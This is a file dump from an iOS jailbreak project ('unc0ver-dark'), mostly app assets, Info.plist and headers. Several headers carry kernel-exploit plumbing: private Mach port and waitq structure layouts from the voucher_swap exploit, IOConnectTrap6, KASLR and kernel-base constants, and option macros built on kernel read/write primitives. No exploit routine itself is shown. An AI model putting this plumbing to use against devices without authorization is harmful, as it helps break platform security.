https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/Assets.xcassets/AppIcon.appiconset/Icon-App-20x20@2x-1.png
--------------------------------------------------------------------------------
/Undecimus/Assets.xcassets/AppIcon.appiconset/Icon-App-20x20@2x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/Assets.xcassets/AppIcon.appiconset/Icon-App-20x20@2x.png
--------------------------------------------------------------------------------
/Undecimus/Assets.xcassets/AppIcon.appiconset/Icon-App-20x20@3x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/Assets.xcassets/AppIcon.appiconset/Icon-App-20x20@3x.png
--------------------------------------------------------------------------------
/Undecimus/Assets.xcassets/AppIcon.appiconset/Icon-App-29x29@1x-1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/Assets.xcassets/AppIcon.appiconset/Icon-App-29x29@1x-1.png
--------------------------------------------------------------------------------
/Undecimus/Assets.xcassets/AppIcon.appiconset/Icon-App-29x29@1x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/Assets.xcassets/AppIcon.appiconset/Icon-App-29x29@1x.png
--------------------------------------------------------------------------------
/Undecimus/Assets.xcassets/AppIcon.appiconset/Icon-App-29x29@2x-1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/Assets.xcassets/AppIcon.appiconset/Icon-App-29x29@2x-1.png
--------------------------------------------------------------------------------
/Undecimus/Assets.xcassets/AppIcon.appiconset/Icon-App-29x29@2x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/Assets.xcassets/AppIcon.appiconset/Icon-App-29x29@2x.png
--------------------------------------------------------------------------------
/Undecimus/Assets.xcassets/AppIcon.appiconset/Icon-App-29x29@3x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/Assets.xcassets/AppIcon.appiconset/Icon-App-29x29@3x.png
--------------------------------------------------------------------------------
/Undecimus/Assets.xcassets/AppIcon.appiconset/Icon-App-40x40@1x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/Assets.xcassets/AppIcon.appiconset/Icon-App-40x40@1x.png
--------------------------------------------------------------------------------
/Undecimus/Assets.xcassets/AppIcon.appiconset/Icon-App-40x40@2x-1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/Assets.xcassets/AppIcon.appiconset/Icon-App-40x40@2x-1.png
--------------------------------------------------------------------------------
/Undecimus/Assets.xcassets/AppIcon.appiconset/Icon-App-40x40@2x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/Assets.xcassets/AppIcon.appiconset/Icon-App-40x40@2x.png
--------------------------------------------------------------------------------
/Undecimus/Assets.xcassets/AppIcon.appiconset/Icon-App-40x40@3x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/Assets.xcassets/AppIcon.appiconset/Icon-App-40x40@3x.png
--------------------------------------------------------------------------------
/Undecimus/Assets.xcassets/AppIcon.appiconset/Icon-App-60x60@2x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/Assets.xcassets/AppIcon.appiconset/Icon-App-60x60@2x.png
--------------------------------------------------------------------------------
/Undecimus/Assets.xcassets/AppIcon.appiconset/Icon-App-60x60@3x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/Assets.xcassets/AppIcon.appiconset/Icon-App-60x60@3x.png
--------------------------------------------------------------------------------
/Undecimus/Assets.xcassets/AppIcon.appiconset/Icon-App-76x76@1x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/Assets.xcassets/AppIcon.appiconset/Icon-App-76x76@1x.png
--------------------------------------------------------------------------------
/Undecimus/Assets.xcassets/AppIcon.appiconset/Icon-App-76x76@2x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/Assets.xcassets/AppIcon.appiconset/Icon-App-76x76@2x.png
--------------------------------------------------------------------------------
/Undecimus/Assets.xcassets/AppIcon.appiconset/Icon-App-83.5x83.5@2x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/Assets.xcassets/AppIcon.appiconset/Icon-App-83.5x83.5@2x.png
--------------------------------------------------------------------------------
/Undecimus/Assets.xcassets/Contents.json:
--------------------------------------------------------------------------------
1 | {
2 | "info" : {
3 | "version" : 1,
4 | "author" : "xcode"
5 | }
6 | }
--------------------------------------------------------------------------------
/Undecimus/Assets.xcassets/maintenance.imageset/Contents.json:
--------------------------------------------------------------------------------
1 | {
2 | "images" : [
3 | {
4 | "idiom" : "universal",
5 | "filename" : "maintenance.png",
6 | "scale" : "1x"
7 | },
8 | {
9 | "idiom" : "universal",
10 | "filename" : "maintenance@2x.png",
11 | "scale" : "2x"
12 | },
13 | {
14 | "idiom" : "universal",
15 | "filename" : "maintenance@3x.png",
16 | "scale" : "3x"
17 | }
18 | ],
19 | "info" : {
20 | "version" : 1,
21 | "author" : "xcode"
22 | }
23 | }
--------------------------------------------------------------------------------
/Undecimus/Assets.xcassets/maintenance.imageset/maintenance.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/Assets.xcassets/maintenance.imageset/maintenance.png
--------------------------------------------------------------------------------
/Undecimus/Assets.xcassets/maintenance.imageset/maintenance@2x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/Assets.xcassets/maintenance.imageset/maintenance@2x.png
--------------------------------------------------------------------------------
/Undecimus/Assets.xcassets/maintenance.imageset/maintenance@3x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/Assets.xcassets/maintenance.imageset/maintenance@3x.png
--------------------------------------------------------------------------------
/Undecimus/Assets.xcassets/meridian.imageset/Contents.json:
--------------------------------------------------------------------------------
1 | {
2 | "images" : [
3 | {
4 | "idiom" : "universal",
5 | "filename" : "picker.png",
6 | "scale" : "1x"
7 | },
8 | {
9 | "idiom" : "universal",
10 | "filename" : "picker@2x.png",
11 | "scale" : "2x"
12 | },
13 | {
14 | "idiom" : "universal",
15 | "filename" : "picker@3x.png",
16 | "scale" : "3x"
17 | }
18 | ],
19 | "info" : {
20 | "version" : 1,
21 | "author" : "xcode"
22 | }
23 | }
--------------------------------------------------------------------------------
/Undecimus/Assets.xcassets/meridian.imageset/picker.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/Assets.xcassets/meridian.imageset/picker.png
--------------------------------------------------------------------------------
/Undecimus/Assets.xcassets/meridian.imageset/picker@2x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/Assets.xcassets/meridian.imageset/picker@2x.png
--------------------------------------------------------------------------------
/Undecimus/Assets.xcassets/meridian.imageset/picker@3x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/Assets.xcassets/meridian.imageset/picker@3x.png
--------------------------------------------------------------------------------
/Undecimus/Assets.xcassets/picker.imageset/Contents.json:
--------------------------------------------------------------------------------
1 | {
2 | "images" : [
3 | {
4 | "idiom" : "universal",
5 | "filename" : "picker.png",
6 | "scale" : "1x"
7 | },
8 | {
9 | "idiom" : "universal",
10 | "filename" : "picker@2x.png",
11 | "scale" : "2x"
12 | },
13 | {
14 | "idiom" : "universal",
15 | "filename" : "picker@3x.png",
16 | "scale" : "3x"
17 | }
18 | ],
19 | "info" : {
20 | "version" : 1,
21 | "author" : "xcode"
22 | }
23 | }
--------------------------------------------------------------------------------
/Undecimus/Assets.xcassets/picker.imageset/picker.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/Assets.xcassets/picker.imageset/picker.png
--------------------------------------------------------------------------------
/Undecimus/Assets.xcassets/picker.imageset/picker@2x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/Assets.xcassets/picker.imageset/picker@2x.png
--------------------------------------------------------------------------------
/Undecimus/Assets.xcassets/picker.imageset/picker@3x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/Assets.xcassets/picker.imageset/picker@3x.png
--------------------------------------------------------------------------------
/Undecimus/Assets.xcassets/purple.imageset/Contents.json:
--------------------------------------------------------------------------------
1 | {
2 | "images" : [
3 | {
4 | "idiom" : "universal",
5 | "filename" : "picker.png",
6 | "scale" : "1x"
7 | },
8 | {
9 | "idiom" : "universal",
10 | "filename" : "picker@2x.png",
11 | "scale" : "2x"
12 | },
13 | {
14 | "idiom" : "universal",
15 | "filename" : "picker@3x.png",
16 | "scale" : "3x"
17 | }
18 | ],
19 | "info" : {
20 | "version" : 1,
21 | "author" : "xcode"
22 | }
23 | }
--------------------------------------------------------------------------------
/Undecimus/Assets.xcassets/purple.imageset/picker.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/Assets.xcassets/purple.imageset/picker.png
--------------------------------------------------------------------------------
/Undecimus/Assets.xcassets/purple.imageset/picker@2x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/Assets.xcassets/purple.imageset/picker@2x.png
--------------------------------------------------------------------------------
/Undecimus/Assets.xcassets/purple.imageset/picker@3x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/Assets.xcassets/purple.imageset/picker@3x.png
--------------------------------------------------------------------------------
/Undecimus/Assets.xcassets/settings.imageset/Contents.json:
--------------------------------------------------------------------------------
1 | {
2 | "images" : [
3 | {
4 | "idiom" : "universal",
5 | "filename" : "settings.png",
6 | "scale" : "1x"
7 | },
8 | {
9 | "idiom" : "universal",
10 | "filename" : "settings@2x.png",
11 | "scale" : "2x"
12 | },
13 | {
14 | "idiom" : "universal",
15 | "filename" : "settings@3x.png",
16 | "scale" : "3x"
17 | }
18 | ],
19 | "info" : {
20 | "version" : 1,
21 | "author" : "xcode"
22 | }
23 | }
--------------------------------------------------------------------------------
/Undecimus/Assets.xcassets/settings.imageset/settings.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/Assets.xcassets/settings.imageset/settings.png
--------------------------------------------------------------------------------
/Undecimus/Assets.xcassets/settings.imageset/settings@2x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/Assets.xcassets/settings.imageset/settings@2x.png
--------------------------------------------------------------------------------
/Undecimus/Assets.xcassets/settings.imageset/settings@3x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/Assets.xcassets/settings.imageset/settings@3x.png
--------------------------------------------------------------------------------
/Undecimus/Assets.xcassets/white.imageset/Contents.json:
--------------------------------------------------------------------------------
1 | {
2 | "images" : [
3 | {
4 | "idiom" : "universal",
5 | "filename" : "picker.png",
6 | "scale" : "1x"
7 | },
8 | {
9 | "idiom" : "universal",
10 | "filename" : "picker@2x.png",
11 | "scale" : "2x"
12 | },
13 | {
14 | "idiom" : "universal",
15 | "filename" : "picker@3x.png",
16 | "scale" : "3x"
17 | }
18 | ],
19 | "info" : {
20 | "version" : 1,
21 | "author" : "xcode"
22 | }
23 | }
--------------------------------------------------------------------------------
/Undecimus/Assets.xcassets/white.imageset/picker.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/Assets.xcassets/white.imageset/picker.png
--------------------------------------------------------------------------------
/Undecimus/Assets.xcassets/white.imageset/picker@2x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/Assets.xcassets/white.imageset/picker@2x.png
--------------------------------------------------------------------------------
/Undecimus/Assets.xcassets/white.imageset/picker@3x.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/nqcshady/unc0ver-dark/4107792f2e78a6a071b1158115d699972c66e6e2/Undecimus/Assets.xcassets/white.imageset/picker@3x.png
--------------------------------------------------------------------------------
/Undecimus/Base.lproj/LaunchScreen.storyboard:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
19 |
20 |
21 |
22 |
23 |
24 |
25 |
26 |
27 |
28 |
29 |
--------------------------------------------------------------------------------
/Undecimus/Info.plist:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | CFBundleDevelopmentRegion
6 | $(DEVELOPMENT_LANGUAGE)
7 | CFBundleDisplayName
8 | unc0ver dark
9 | CFBundleExecutable
10 | $(EXECUTABLE_NAME)
11 | CFBundleIcons
12 |
13 | CFBundleAlternateIcons
14 |
15 | DarkMeridianIcon
16 |
17 | CFBundleIconFiles
18 |
19 | darkmeridian
20 |
21 | UIPrerenderedIcon
22 |
23 |
24 | MeridianIcon
25 |
26 | CFBundleIconFiles
27 |
28 | meridian
29 |
30 | UIPrerenderedIcon
31 |
32 |
33 | PurpleIcon
34 |
35 | CFBundleIconFiles
36 |
37 | purple
38 |
39 | UIPrerenderedIcon
40 |
41 |
42 | WhiteIcon
43 |
44 | CFBundleIconFiles
45 |
46 | white
47 |
48 | UIPrerenderedIcon
49 |
50 |
51 |
52 | CFBundlePrimaryIcon
53 |
54 | CFBundleIconFiles
55 |
56 | AppIcon60x60
57 |
58 | UIPrerenderedIcon
59 |
60 |
61 |
62 | CFBundleIdentifier
63 | $(PRODUCT_BUNDLE_IDENTIFIER)
64 | CFBundleInfoDictionaryVersion
65 | 6.0
66 | CFBundleName
67 | unc0ver-dark
68 | CFBundlePackageType
69 | APPL
70 | CFBundleShortVersionString
71 | Uno
72 | CFBundleURLTypes
73 |
74 |
75 | CFBundleTypeRole
76 | Editor
77 | CFBundleURLName
78 | $(PRODUCT_BUNDLE_IDENTIFIER)
79 | CFBundleURLSchemes
80 |
81 | unc0ver-dark
82 |
83 |
84 |
85 | CFBundleVersion
86 | 1
87 | LSApplicationQueriesSchemes
88 |
89 | tweetbot
90 | twitterrific
91 | tweetings
92 | twitter
93 |
94 | LSRequiresIPhoneOS
95 |
96 | UIFileSharingEnabled
97 |
98 | UILaunchStoryboardName
99 | LaunchScreen
100 | UIMainStoryboardFile
101 | Main
102 | UIRequiredDeviceCapabilities
103 |
104 | armv7
105 |
106 | UIStatusBarHidden
107 |
108 | UIStatusBarStyle
109 | UIStatusBarStyleLightContent
110 | UISupportedInterfaceOrientations
111 |
112 | UIInterfaceOrientationPortrait
113 |
114 | UISupportedInterfaceOrientations~ipad
115 |
116 | UIInterfaceOrientationPortrait
117 | UIInterfaceOrientationPortraitUpsideDown
118 | UIInterfaceOrientationLandscapeLeft
119 | UIInterfaceOrientationLandscapeRight
120 |
121 | UIViewControllerBasedStatusBarAppearance
122 |
123 |
124 |
125 |
--------------------------------------------------------------------------------
/Undecimus/include/IOKitLib.h:
--------------------------------------------------------------------------------
1 | /*
2 | * IOKitLib.h
3 | * Brandon Azad
4 | */
5 | #ifndef VOUCHER_SWAP__IOKITLIB_H_
6 | #define VOUCHER_SWAP__IOKITLIB_H_
7 |
8 | #include
9 | #include
10 |
11 | typedef mach_port_t io_object_t;
12 | typedef io_object_t io_connect_t;
13 | typedef io_object_t io_iterator_t;
14 | typedef io_object_t io_service_t;
15 |
16 | extern const mach_port_t kIOMasterPortDefault;
17 |
18 | kern_return_t
19 | IOObjectRelease(
20 | io_object_t object );
21 |
22 | io_object_t
23 | IOIteratorNext(
24 | io_iterator_t iterator );
25 |
26 | io_service_t
27 | IOServiceGetMatchingService(
28 | mach_port_t masterPort,
29 | CFDictionaryRef matching CF_RELEASES_ARGUMENT);
30 |
31 | kern_return_t
32 | IOServiceGetMatchingServices(
33 | mach_port_t masterPort,
34 | CFDictionaryRef matching CF_RELEASES_ARGUMENT,
35 | io_iterator_t * existing );
36 |
37 | kern_return_t
38 | IOServiceOpen(
39 | io_service_t service,
40 | task_port_t owningTask,
41 | uint32_t type,
42 | io_connect_t * connect );
43 |
44 | kern_return_t
45 | IOServiceClose(
46 | io_connect_t connect );
47 |
48 | kern_return_t
49 | IOConnectCallMethod(
50 | mach_port_t connection, // In
51 | uint32_t selector, // In
52 | const uint64_t *input, // In
53 | uint32_t inputCnt, // In
54 | const void *inputStruct, // In
55 | size_t inputStructCnt, // In
56 | uint64_t *output, // Out
57 | uint32_t *outputCnt, // In/Out
58 | void *outputStruct, // Out
59 | size_t *outputStructCnt) // In/Out
60 | AVAILABLE_MAC_OS_X_VERSION_10_5_AND_LATER;
61 |
62 | kern_return_t
63 | IOConnectTrap6(io_connect_t connect,
64 | uint32_t index,
65 | uintptr_t p1,
66 | uintptr_t p2,
67 | uintptr_t p3,
68 | uintptr_t p4,
69 | uintptr_t p5,
70 | uintptr_t p6);
71 |
72 | CFMutableDictionaryRef
73 | IOServiceMatching(
74 | const char * name ) CF_RETURNS_RETAINED;
75 |
76 | #endif
77 |
--------------------------------------------------------------------------------
/Undecimus/include/NSTask.h:
--------------------------------------------------------------------------------
1 | /* NSTask.h
2 | Copyright (c) 1996-2017, Apple Inc. All rights reserved.
3 | */
4 |
5 | #import
6 | #import
7 |
8 | @class NSArray, NSDictionary, NSString;
9 |
10 | NS_ASSUME_NONNULL_BEGIN
11 |
12 | typedef NS_ENUM(NSInteger, NSTaskTerminationReason) {
13 | NSTaskTerminationReasonExit = 1,
14 | NSTaskTerminationReasonUncaughtSignal = 2
15 | } NS_ENUM_AVAILABLE(10_6, NA);
16 |
17 | @interface NSTask : NSObject
18 |
19 | // Create an NSTask which can be run at a later time
20 | // An NSTask can only be run once. Subsequent attempts to
21 | // run an NSTask will raise.
22 | // Upon task death a notification will be sent
23 | // { Name = NSTaskDidTerminateNotification; object = task; }
24 | //
25 |
26 | - (instancetype)init NS_DESIGNATED_INITIALIZER;
27 |
28 | // these methods can only be set before a launch
29 | @property (nullable, copy) NSURL *executableURL API_AVAILABLE(macos(10.13)) API_UNAVAILABLE(ios, watchos, tvos);
30 | @property (nullable, copy) NSArray *arguments;
31 | @property (nullable, copy) NSDictionary *environment; // if not set, use current
32 | @property (nullable, copy) NSURL *currentDirectoryURL API_AVAILABLE(macos(10.13)) API_UNAVAILABLE(ios, watchos, tvos);
33 |
34 | // standard I/O channels; could be either an NSFileHandle or an NSPipe
35 | @property (nullable, retain) id standardInput;
36 | @property (nullable, retain) id standardOutput;
37 | @property (nullable, retain) id standardError;
38 |
39 | // actions
40 | - (BOOL)launchAndReturnError:(out NSError **_Nullable)error API_AVAILABLE(macos(10.13)) API_UNAVAILABLE(ios, watchos, tvos);
41 |
42 | - (void)interrupt; // Not always possible. Sends SIGINT.
43 | - (void)terminate; // Not always possible. Sends SIGTERM.
44 |
45 | - (BOOL)suspend;
46 | - (BOOL)resume;
47 |
48 | // status
49 | @property (readonly) int processIdentifier;
50 | @property (readonly, getter=isRunning) BOOL running;
51 |
52 | @property (readonly) int terminationStatus;
53 | @property (readonly) NSTaskTerminationReason terminationReason API_AVAILABLE(macos(10.6)) API_UNAVAILABLE(ios, watchos, tvos);
54 |
55 | /*
56 | A block to be invoked when the process underlying the NSTask terminates. Setting the block to nil is valid, and stops the previous block from being invoked, as long as it hasn't started in any way. The NSTask is passed as the argument to the block so the block does not have to capture, and thus retain, it. The block is copied when set. Only one termination handler block can be set at any time. The execution context in which the block is invoked is undefined. If the NSTask has already finished, the block is executed immediately/soon (not necessarily on the current thread). If a terminationHandler is set on an NSTask, the NSTaskDidTerminateNotification notification is not posted for that task. Also note that -waitUntilExit won't wait until the terminationHandler has been fully executed. You cannot use this property in a concrete subclass of NSTask which hasn't been updated to include an implementation of the storage and use of it.
57 | */
58 | @property (nullable, copy) void (^terminationHandler)(NSTask *) API_AVAILABLE(macos(10.7)) API_UNAVAILABLE(ios, watchos, tvos);
59 |
60 | @property NSQualityOfService qualityOfService API_AVAILABLE(macos(10.10), ios(8.0), watchos(2.0), tvos(9.0)); // read-only after the task is launched
61 |
62 | @end
63 |
64 | @interface NSTask (NSTaskConveniences)
65 |
66 | + (nullable NSTask *)launchedTaskWithExecutableURL:(NSURL *)url arguments:(NSArray *)arguments error:(out NSError ** _Nullable)error terminationHandler:(void (^_Nullable)(NSTask *))terminationHandler API_AVAILABLE(macos(10.13)) API_UNAVAILABLE(ios, watchos, tvos);
67 |
68 | - (void)waitUntilExit;
69 | // poll the runLoop in defaultMode until task completes
70 |
71 | @end
72 |
73 | @interface NSTask (NSDeprecated)
74 |
75 | @property (nullable, copy) NSString *launchPath;
76 | @property (copy) NSString *currentDirectoryPath; // if not set, use current
77 |
78 | - (void)launch;
79 |
80 | + (NSTask *)launchedTaskWithLaunchPath:(NSString *)path arguments:(NSArray *)arguments;
81 | // convenience; create and launch
82 |
83 | @end
84 |
85 | FOUNDATION_EXPORT NSNotificationName const NSTaskDidTerminateNotification;
86 |
87 | NS_ASSUME_NONNULL_END
88 |
--------------------------------------------------------------------------------
/Undecimus/include/UIProgressHUD.h:
--------------------------------------------------------------------------------
1 | #import
2 |
3 | @class UIProgressIndicator, UILabel, UIImageView, UIWindow;
4 |
5 | @interface UIProgressHUD : UIView {
6 |
7 | UIProgressIndicator* _progressIndicator;
8 | UILabel* _progressMessage;
9 | UIImageView* _doneView;
10 | UIWindow* _parentWindow;
11 | struct {
12 | unsigned isShowing : 1;
13 | unsigned isShowingText : 1;
14 | unsigned fixedFrame : 1;
15 | unsigned reserved : 30;
16 | } _progressHUDFlags;
17 |
18 | }
19 | -(id)initWithFrame:(CGRect)arg1 ;
20 | -(void)layoutSubviews;
21 | -(void)hide;
22 | -(void)show:(bool)arg1 ;
23 | -(void)drawRect:(CGRect)arg1 ;
24 | -(void)dealloc;
25 | -(void)setText:(id)arg1 ;
26 | -(id)initWithWindow:(id)arg1 ;
27 | -(void)done;
28 | -(void)setFontSize:(int)arg1 ;
29 | -(id)_progressIndicator;
30 | -(void)setShowsText:(bool)arg1 ;
31 | -(void)showInView:(id)arg1 ;
32 | @end
33 |
34 |
--------------------------------------------------------------------------------
/Undecimus/include/common.h:
--------------------------------------------------------------------------------
1 | #ifndef COMMON_H
2 | #define COMMON_H
3 |
4 | #include // uint*_t
5 | #include
6 | #include
7 | #include
8 | #ifdef __OBJC__
9 | #include
10 | #define RAWLOG(str, args...) do { NSLog(@str, ##args); } while(false)
11 | #define localize(x) NSLocalizedString(x, @"")
12 | #define ADDRSTRING(val) [NSString stringWithFormat:@ADDR, val]
13 | #else
14 | #include
15 | extern void NSLog(CFStringRef, ...);
16 | #define RAWLOG(str, args...) do { NSLog(CFSTR(str), ##args); } while(false)
17 | #define BOOL bool
18 | #define YES ((BOOL) true)
19 | #define NO ((BOOL) false)
20 | #endif
21 |
22 | #define LOG(str, args...) RAWLOG("[*] " str, ##args)
23 |
24 | #define SafeFree(x) do { if (x) free(x); } while(false)
25 | #define SafeFreeNULL(x) do { SafeFree(x); (x) = NULL; } while(false)
26 | #define CFSafeRelease(x) do { if (x) CFRelease(x); } while(false)
27 | #define CFSafeReleaseNULL(x) do { CFSafeRelease(x); (x) = NULL; } while(false)
28 | #define SafeSFree(x) do { if (KERN_POINTER_VALID(x)) sfree(x); } while(false)
29 | #define SafeSFreeNULL(x) do { SafeSFree(x); (x) = KPTR_NULL; } while(false)
30 | #define SafeIOFree(x, size) do { if (KERN_POINTER_VALID(x)) IOFree(x, size); } while(false)
31 | #define SafeIOFreeNULL(x, size) do { SafeIOFree(x, size); (x) = KPTR_NULL; } while(false)
32 |
33 | #define kCFCoreFoundationVersionNumber_iOS_12_0 1535.12
34 | #define kCFCoreFoundationVersionNumber_iOS_11_3 1452.23
35 | #define kCFCoreFoundationVersionNumber_iOS_11_0 1443.00
36 |
37 | #define __FILENAME__ (__builtin_strrchr(__FILE__, '/') ? __builtin_strrchr(__FILE__, '/') + 1 : __FILE__)
38 |
39 | #define ADDR "0x%016llx"
40 | #define MACH_HEADER_MAGIC MH_MAGIC_64
41 | #define MACH_LC_SEGMENT LC_SEGMENT_64
42 | typedef struct mach_header_64 mach_hdr_t;
43 | typedef struct segment_command_64 mach_seg_t;
44 | typedef struct load_command mach_lc_t;
45 | typedef uint64_t kptr_t;
46 | #define KPTR_NULL ((kptr_t) 0)
47 | #define KERN_POINTER_VALID(val) ((val) >= 0xffff000000000000 && (val) != 0xffffffffffffffff)
48 | #define MAX_KASLR_SLIDE 0x21000000
49 | #define STATIC_KERNEL_BASE_ADDRESS 0xfffffff007004000
50 |
51 | extern kptr_t offset_options;
52 | #define OPT(x) (offset_options?((rk64(offset_options) & OPT_ ##x)?true:false):false)
53 | #define SETOPT(x) (offset_options?wk64(offset_options, rk64(offset_options) | OPT_ ##x):0)
54 | #define UNSETOPT(x) (offset_options?wk64(offset_options, rk64(offset_options) & ~OPT_ ##x):0)
55 | #define OPT_GET_TASK_ALLOW (1<<0)
56 | #define OPT_CS_DEBUGGED (1<<1)
57 |
58 | #endif
59 |
60 |
--------------------------------------------------------------------------------
/Undecimus/include/ipc_port.h:
--------------------------------------------------------------------------------
1 | /*
2 | * ipc_port.h
3 | * Brandon Azad
4 | */
5 | #ifndef VOUCHER_SWAP__IPC_PORT_H_
6 | #define VOUCHER_SWAP__IPC_PORT_H_
7 |
8 | #include
9 | #include
10 |
11 | // ---- osfmk/kern/waitq.h ------------------------------------------------------------------------
12 |
13 | #define _EVENT_MASK_BITS ((sizeof(uint32_t) * 8) - 7)
14 |
15 | #define WQT_QUEUE 0x2
16 |
17 | union waitq_flags {
18 | struct {
19 | uint32_t /* flags */
20 | waitq_type:2, /* only public field */
21 | waitq_fifo:1, /* fifo wakeup policy? */
22 | waitq_prepost:1, /* waitq supports prepost? */
23 | waitq_irq:1, /* waitq requires interrupts disabled */
24 | waitq_isvalid:1, /* waitq structure is valid */
25 | waitq_turnstile_or_port:1, /* waitq is embedded in a turnstile (if irq safe), or port (if not irq safe) */
26 | waitq_eventmask:_EVENT_MASK_BITS;
27 | };
28 | uint32_t flags;
29 | };
30 |
31 | // ---- osfmk/kern/ipc_kobject.h ------------------------------------------------------------------
32 |
33 | #define IKOT_NONE 0
34 | #define IKOT_TASK 2
35 |
36 | // ---- osfmk/ipc/ipc_object.h --------------------------------------------------------------------
37 |
38 | #define IO_BITS_KOTYPE 0x00000fff /* used by the object */
39 | #define IO_BITS_ACTIVE 0x80000000 /* is object alive? */
40 |
41 | #define io_makebits(active, otype, kotype) \
42 | (((active) ? IO_BITS_ACTIVE : 0) | ((otype) << 16) | (kotype))
43 |
44 | #define IOT_PORT 0
45 |
46 | // ---- Custom definitions ------------------------------------------------------------------------
47 |
48 | #define MACH_HEADER_SIZE_DELTA (2 * (sizeof(uint64_t) - sizeof(uint32_t)))
49 |
50 | // ------------------------------------------------------------------------------------------------
51 |
52 | #endif
53 |
--------------------------------------------------------------------------------
/Undecimus/include/libproc.h:
--------------------------------------------------------------------------------
1 | /*
2 | * Copyright (c) 2006, 2007 Apple Inc. All rights reserved.
3 | *
4 | * @APPLE_LICENSE_HEADER_START@
5 | *
6 | * This file contains Original Code and/or Modifications of Original Code
7 | * as defined in and that are subject to the Apple Public Source License
8 | * Version 2.0 (the 'License'). You may not use this file except in
9 | * compliance with the License. Please obtain a copy of the License at
10 | * http://www.opensource.apple.com/apsl/ and read it before using this
11 | * file.
12 | *
13 | * The Original Code and all software distributed under the License are
